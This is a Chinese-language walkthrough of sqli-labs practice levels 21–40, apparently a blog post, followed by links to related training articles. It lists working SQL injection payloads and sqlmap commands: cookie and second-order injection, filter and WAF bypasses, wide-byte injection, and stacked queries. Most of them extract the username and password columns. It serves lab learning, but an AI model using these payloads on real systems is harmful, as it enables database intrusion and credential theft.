sqli靶场21-40关

21.cookie注入
首先需要登录账号，登录后会抓到一个cookie的包
这个cookie就是一个注入点，而且经过base64加密，提交的shellcode也需要base64加密。

‘) or 1=1 #
加密后
Jykgb3IgMT0xICM=

跑sqlmap方法
sqlmap -u “http://192.168.207.253/sqli-lab/Less-21/index.php” --cookie=“uname=” --time-sec=2 --level 3 --threads=10 --tables --tamper base64encode -v 5
跑的有点久，但是跑出来了

22.cookie注入
和上题一样，只是换成了双引号闭合
跑sqlmap

23.注释符号过滤
qing’ union select 1,group_concat(username),group_concat(password) from users where 1 or ‘1’ = ’

跑sqlmap
sqlmap跑不出来，pass

24.二次注入
账号注册 admin’ or 1=1#
登录账号时触发。所有密码都变成了123456
这道题跑不了sqlmap

25.注入过滤
id=1’ oorr ‘1’='1
跑sqlmap，2000条跑不出来，pass

25a

和25关一样，没有单引号
?id=-1 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=‘security’ --+

26.过滤
单引号闭合过滤了 or，and ， /* , – , # , 空格 , /

qing’%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0’1

26a

比26多一个闭合括号

27.大小写过多过滤

0’%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0’1

27a.
闭合不一样
0"%A0or(1)=(1)%26%26%a0"1

?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema=‘security’%26%26%a0"1

?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

过滤union select这一个组合，也要过滤空格，所以采用union union select select方法绕过，空格照样用%0a替换

0’)%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1

28a.
一样的原理

29.弱waf
加了一个很弱的"waf…"

注入方法就是参数污染

例子显示的是id=2的内容但是waf检测的是前面id=1的内容
?id=’ union select 1,version(),database() --+

?id=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ --+

id=’ union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

29一样

和29一样

简单说check_addslashes函数把\ 单引号双引号都进行过滤转义

明显的编码gbk 宽字节注入不用多说

?id=-1%df%27 UNion seleCt 1,2,DATABASE()–+

同上

变成32 33 post的方式而已没意义

id没有被单引号括起来所以addslashes起不到作用

正常各种payload即可:

?id=-1x and extractvalue(1,concat(0x7e,(select database()),0x7e))–+

mysql_real_escape_string转义还是一样不多说

post登录

uname=admin%df%27 or 1=2 union select 1,database()#

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。（有这个才能进行堆叠）
分号我们可以加入注入的新的语句

堆叠注入

?id=2%FE' or 1=1 %23

?id=0%FE’ union select 1,version(),database() %23

?id=0%FE’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

?id=0%FE’ union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

参考38

sqli靶场21-40关相关推荐

mysql靶场_搭建sqli靶场
前言: sqli是一个印度程序员编写的,用来学习sql注入的一个游戏教程 sqli这个靶场对php7.0是不兼容的(因为一些函数在php7中被删除了),所以搭建的时候要下载php5,如果你的系统要下载 ...
文件上传之.htaccess绕过黑名单——upload-labs靶场第四关
今天继续给大家介绍渗透测试相关知识,本文主要内容是介绍.htaccess绕过黑名单的文件上传方法,并借助upload-labs靶场的第四关进行了实战. 免责声明: 本文所介绍的内容仅做学习交流使用,严 ...
【less-4】sqli-labs靶场第四关
网址 https://sqli.wmcoder.site/sqli-labs/Less-4/ 解法与Less-2类似,直接看这篇文章:[less-2]sqli-labs靶场第二关不同的是,根据错误 ...
upload-labs-master文件上传靶场第七关详解
一.前言 upload-labs-master是文件上传靶场,里面目前总共有19关,github地址https://github.com/c0ny1/upload-labs,今天要说的是这个靶场的第七 ...
【less-7】sqli-labs靶场第七关（类似less-5）
第七关和第五关相比单引号和双括号,简单构造一下即可 https://sqli.wmcoder.site/sqli-labs/Less-7?id=1')) and ord(mid((select I ...
软件设计师知识点100条（21~40）
目录 21.树形目录结构(多级目录结构) 22.I/O管理软件 23.分布式透明性 24.数据库三级模式两级映像 25.数据库设计过程 26.关系模式基本概念 27.候选键 28.E-R图转关系模式转 ...
C语言例题100道（21~40）
例题21:猴子吃桃问题:猴子第一天摘下若干个桃子,当即吃了一半,还不瘾,又多吃了一个第二天早上又将剩下的桃子吃掉一半,又多吃了一个.以后每天早上都吃了前一天剩下的一半零一个.到第10天早上想再吃时 ...
sql注入思路及sqli靶场
判断是否为动态页面输入不同的id 看回显内容不同则为动态页面判断闭合符号输入\ 回显中\后面的就是闭合符号判断是否存在SQL注入输入1') and 1=1.如果得到输出结果,证明用户可通过 ...
网络安全鹰眼靶场（基础关）
目录前言: key在哪里? 再加密一次你就得到key啦~ 猜猜这是经过了多少次加密? 据说MD5加密很安全,真的是么? 种族歧视 HAHA浏览器 key究竟在哪里呢? key又找不到了冒充登陆用户 ...

sqli靶场21-40关

sqli靶场21-40关相关推荐

最新文章

热门文章